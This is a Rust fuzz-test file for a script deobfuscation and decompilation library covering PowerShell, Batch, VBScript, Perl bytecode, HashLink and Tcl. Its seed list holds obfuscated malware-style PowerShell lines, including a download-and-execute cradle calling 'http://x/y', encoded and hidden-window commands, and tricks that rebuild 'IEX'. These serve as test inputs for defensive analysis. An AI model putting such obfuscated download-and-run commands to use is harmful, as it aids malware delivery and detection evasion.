use std::collections::BTreeMap;

use disrobe_pass_scriptlang::lang::{
    self, hashlink, haxe, perl, perl_bytecode, r_rds, rcpp, tcl, winscript,
};
use disrobe_pass_scriptlang::{
    DecompileWalker, HlCode, HlError, PerlOpTree, PerlSource, RdsObject, WinScriptLang,
};

#[cfg(feature = "chain")]
use disrobe_core::Artifact;
#[cfg(feature = "chain")]
use disrobe_core::Rung;
#[cfg(feature = "chain")]
use disrobe_core::chain::{
    ChildArtifact, DetectContext, DetectVerdict, Detector, OutputKind, Pass,
};
#[cfg(feature = "chain")]
use disrobe_core::error::Result as CoreResult;
#[cfg(feature = "chain")]
use disrobe_pass_scriptlang::chain_detector::{SCRIPTLANG_PASS, ScriptLangDetector};

struct XorShift64 {
    state: u64,
}

impl XorShift64 {
    const fn new(seed: u64) -> Self {
        Self { state: seed | 1 }
    }

    const fn next_u64(&mut self) -> u64 {
        let mut x: u64 = self.state;
        x ^= x << 13;
        x ^= x >> 7;
        x ^= x << 17;
        self.state = x;
        x
    }

    const fn next_usize(&mut self, bound: usize) -> usize {
        if bound == 0 {
            return 0;
        }
        (self.next_u64() % bound as u64) as usize
    }

    const fn next_byte(&mut self) -> u8 {
        (self.next_u64() & 0xff) as u8
    }
}

const SEEDS: &[&str] = &[
    "powershell.exe -EncodedCommand aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA=",
    "iex (New-Object Net.WebClient).DownloadString('http://x/y')",
    "$d=[Convert]::FromBase64String('SGVsbG8gV29ybGQgZnJvbSBzY3JpcHQ='); iex $d",
    "@echo off\r\nset a=cmd\r\nset b=.exe\r\ncall %a%%b%\r\ngoto :eof",
    "@echo off\r\nset payload=powershell -nop -w hidden\r\necho %payload:~0,10%",
    "Set obj = CreateObject(\"WScript.Shell\")\r\nobj.Run \"calc.exe\"",
    "$s='I'+'E'+'X'; $t=ChrW(104)&ChrW(105); Write-Host $s",
    "powershell -c \"$x=('{0}{1}' -f 'IE','X'); &$x\"",
    "[char[]](105,101,120,32,40,78,101,116,41) -join ''",
    "$p='dlrowolleh'[-1..-99] -join ''; iex $p",
    "$k='nidmloc'.Replace('n','X'); ConvertTo-SecureString 'sekret' -AsPlainText -Force",
    "powershell -enc TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAA=",
    "$b=[Convert]::FromBase64String('QUJDREVGR0g='); $x=$b | %{$_ -bxor 0x42}; iex",
    "Dim s : s = Chr(72) & Chr(73) : MsgBox s",
    "for /f \"tokens=*\" %%i in (list.txt) do call :proc %%i",
];

const PARSER_SEEDS: &[&[u8]] = &[
    b"",
    b"X\n",
    b"X\n\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff",
    b"PLBC",
    b"CBLP",
    b"use ByteLoader",
    b"HLB\x05\xff\xff\xff\xff\xff\xff\xff\xff",
    b"// Generated by Haxe 4.3.6\n(function () {})();\n",
    b"NEKOHaxeMain.hx",
    b"FWS\x09\x08\x00\x00\x00",
    b"CWS\x09\xff\xff\xff\xff",
    b"#!/bin/sh\npackage require starkit\nPK\x03\x04",
    b"#!/bin/sh\npackage require starkit\nJL\x1a\x00Mk4.tcl",
    b"hello.pl syntax OK\nmain program:\n1 <;> nextstate(main 1 hello.pl:1) v ->2\n2 <1> leavesub[1 ref] K/REFC,1 ->(end)\n",
    b"MZ\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff",
    b"\x7fELF\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfc\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x01\x00\x00\x00\x00\x00",
];

fn entry_points(bytes: &[u8]) {
    let _: disrobe_pass_scriptlang::Result<winscript::WinScriptRecovery> =
        winscript::analyze(bytes);
    let _: bool = winscript::looks_like_winscript(&String::from_utf8_lossy(bytes));
    let text: String = winscript::decode_text(bytes);
    let _: String = winscript::decode_utf16le(bytes);
    let _: Option<WinScriptLang> = winscript::classify(&text);
    let _: Vec<String> = winscript::base64_blobs(&text);
    let _: Option<Vec<u8>> = winscript::base64_decode(&text);
    let _: String = winscript::strip_backticks(&text);
    let _: String = winscript::strip_carets(&text);
    let _: Option<String> = winscript::decode_encoded_command(&text);
    let _: Option<String> = winscript::rebuild_string_concat(&text);
    let _: Option<String> = winscript::rebuild_format_operator(&text);
    let _: Option<String> = winscript::rebuild_replace(&text);
    let _: Option<String> = winscript::rebuild_string_reverse(&text);
    let _: Option<String> = winscript::rebuild_char_builder(&text);
    let _: Option<String> = winscript::rebuild_char_codes(&text);
    let _: Option<String> = winscript::resolve_batch_substrings(&text);
    let _: Option<String> = winscript::detect_embedded_pe(&text);
    let _: Option<String> = winscript::recover_securestring_plaintext(&text);
    for lang in [
        WinScriptLang::PowerShell,
        WinScriptLang::Batch,
        WinScriptLang::VbScript,
    ] {
        let _: winscript::WinScriptRecovery = winscript::recover(lang, &text);
    }
}

fn decompile(tree: &PerlOpTree) {
    let _: PerlSource = DecompileWalker::new(tree).decompile();
}

fn hashlink_entry_points(code: &HlCode) {
    let _: bool = code.fully_parsed();
    let _: Vec<String> = code.object_type_names();
    let _: Vec<String> = code.enum_type_names();
    let _: Vec<String> = code.method_names();
    let _: Vec<String> = code.native_labels();
    let _: Vec<String> = code.user_source_files();
    let _: Option<&hashlink::HlFunction> = code.function_by_findex(code.entrypoint);
    let _: Option<&hashlink::HlFunction> = code.entry_function();
    let names: BTreeMap<usize, String> = code.function_name_map();
    for index in 0usize..code.types.len() {
        let _: String = code.type_name(index);
    }
    let _: hashlink::HlSummary = code.summary();
    let _: String = code.disassemble();
    for function in &code.functions {
        let _: String = code.disassemble_function(function, &names);
    }
}

fn parse_entry_points(bytes: &[u8]) {
    let _: Option<lang::ScriptLang> = disrobe_pass_scriptlang::classify(bytes);
    let _: disrobe_pass_scriptlang::Result<lang::ScriptArtifact> =
        disrobe_pass_scriptlang::analyze(bytes);
    let _: disrobe_pass_scriptlang::Result<rcpp::RcppFingerprint> =
        disrobe_pass_scriptlang::analyze_rcpp(bytes);

    let _: bool = perl::is_concise(bytes);
    let concise: disrobe_pass_scriptlang::Result<PerlOpTree> = perl::read_concise(bytes);
    if let Ok(tree) = concise {
        decompile(&tree);
    }

    let _: bool = disrobe_pass_scriptlang::is_bytecode(bytes);
    let _: bool = perl_bytecode::looks_like_byteloader_script(bytes);
    let bytecode: disrobe_pass_scriptlang::Result<PerlOpTree> =
        disrobe_pass_scriptlang::read_bytecode(bytes);
    if let Ok(tree) = bytecode {
        decompile(&tree);
    }

    let _: bool = r_rds::is_rds(bytes);
    let rds: disrobe_pass_scriptlang::Result<RdsObject> = r_rds::read_rds(bytes);
    if let Ok(object) = rds {
        let _: rcpp::RcppFingerprint = rcpp::fingerprint(&object, bytes);
    }

    let _: bool = tcl::is_starkit(bytes);
    let _: Option<tcl::StarkitFormat> = tcl::detect_format(bytes);
    let _: bool = tcl::has_starkit_header(bytes);
    let _: disrobe_pass_scriptlang::Result<tcl::StarkitContainer> = tcl::extract(bytes);

    let _: Option<haxe::HaxeFingerprint> = haxe::detect(bytes);
    let _: Option<haxe::HaxeCrossRoute> = disrobe_pass_scriptlang::route_cross_target(bytes);
    let code: core::result::Result<HlCode, HlError> = disrobe_pass_scriptlang::read_code(bytes);
    if let Ok(parsed) = code {
        hashlink_entry_points(&parsed);
    }

    let text: String = String::from_utf8_lossy(bytes).into_owned();
    let strings: Vec<String> = text.split(['\0', '\n', '\r']).map(str::to_owned).collect();
    let _: Vec<String> = rcpp::detect_markers(&strings);
    let _: bool = rcpp::description_links_rcpp(&strings);
    let _: Vec<rcpp::EmbeddedNativeImage> = rcpp::scan_native_images(bytes);
    entry_points(bytes);

    #[cfg(feature = "chain")]
    chain_entry_points(bytes);
}

#[cfg(feature = "chain")]
fn chain_entry_points(bytes: &[u8]) {
    let artifact: Artifact = Artifact::new(Rung::Raw, bytes.to_vec(), [0u8; 32]);
    let context: DetectContext<'_> = DetectContext {
        bytes,
        path_hint: None,
        parent_hint: None,
        depth: 0u8,
    };
    let _: Option<DetectVerdict> = ScriptLangDetector.detect(&context);
    let result: CoreResult<Artifact> = SCRIPTLANG_PASS.run(&artifact);
    let _: CoreResult<Vec<ChildArtifact>> = SCRIPTLANG_PASS.extract_children(&artifact);
    if let Ok(output) = result {
        let _: OutputKind = SCRIPTLANG_PASS.output_kind(&output);
    }
}

fn mutate(rng: &mut XorShift64, base: &[u8], out: &mut Vec<u8>) {
    out.clear();
    out.extend_from_slice(base);
    let edits: usize = 1 + rng.next_usize(8);
    for _ in 0..edits {
        if out.is_empty() {
            out.push(rng.next_byte());
            continue;
        }
        match rng.next_usize(7) {
            0 => {
                let idx: usize = rng.next_usize(out.len());
                out[idx] = rng.next_byte();
            }
            1 => {
                let idx: usize = rng.next_usize(out.len() + 1);
                out.insert(idx, rng.next_byte());
            }
            2 => {
                let idx: usize = rng.next_usize(out.len());
                out.remove(idx);
            }
            3 => {
                let cut: usize = rng.next_usize(out.len() + 1);
                out.truncate(cut);
            }
            4 => {
                let byte: u8 = match rng.next_usize(6) {
                    0 => b'%',
                    1 => b'\'',
                    2 => b'"',
                    3 => b'`',
                    4 => b'^',
                    _ => b':',
                };
                let idx: usize = rng.next_usize(out.len() + 1);
                out.insert(idx, byte);
            }
            5 => {
                let n: usize = rng.next_usize(32);
                for _ in 0..n {
                    out.push(0xff);
                }
            }
            _ => {
                let idx: usize = rng.next_usize(out.len());
                out[idx] = out[idx].wrapping_add(0x80);
            }
        }
    }
}

#[test]
fn fuzz_winscript_entry_points_return_normally() {
    const MAX_INPUT: usize = 8 * 1024;
    let mut rng: XorShift64 = XorShift64::new(0x9E37_79B9_7F4A_7C15);
    let mut buf: Vec<u8> = Vec::with_capacity(MAX_INPUT);

    for seed in SEEDS {
        entry_points(seed.as_bytes());
    }

    let iterations: usize = 4_096;
    for _ in 0..iterations {
        let base: &str = SEEDS[rng.next_usize(SEEDS.len())];
        mutate(&mut rng, base.as_bytes(), &mut buf);
        if buf.len() > MAX_INPUT {
            buf.truncate(MAX_INPUT);
        }
        entry_points(&buf);
    }

    let mut random_rng: XorShift64 = XorShift64::new(0xDEAD_BEEF_CAFE_F00D);
    for _ in 0..1_024usize {
        let len: usize = random_rng.next_usize(512usize);
        buf.clear();
        for _ in 0..len {
            buf.push(random_rng.next_byte());
        }
        entry_points(&buf);
    }
}

#[test]
fn fuzz_parse_entry_points_return_normally() {
    const MAX_INPUT: usize = 4 * 1024;
    const STRUCTURED_CASES: usize = 512;
    const RANDOM_CASES: usize = 256;
    let mut rng: XorShift64 = XorShift64::new(0xC6A4_A793_5BD1_E995);
    let mut buf: Vec<u8> = Vec::with_capacity(MAX_INPUT);

    for seed in PARSER_SEEDS {
        parse_entry_points(seed);
    }

    for _ in 0..STRUCTURED_CASES {
        let base: &[u8] = PARSER_SEEDS[rng.next_usize(PARSER_SEEDS.len())];
        mutate(&mut rng, base, &mut buf);
        if buf.len() > MAX_INPUT {
            buf.truncate(MAX_INPUT);
        }
        parse_entry_points(&buf);
    }

    for _ in 0..RANDOM_CASES {
        let len: usize = rng.next_usize(MAX_INPUT + 1usize);
        buf.clear();
        for _ in 0..len {
            buf.push(rng.next_byte());
        }
        parse_entry_points(&buf);
    }
}
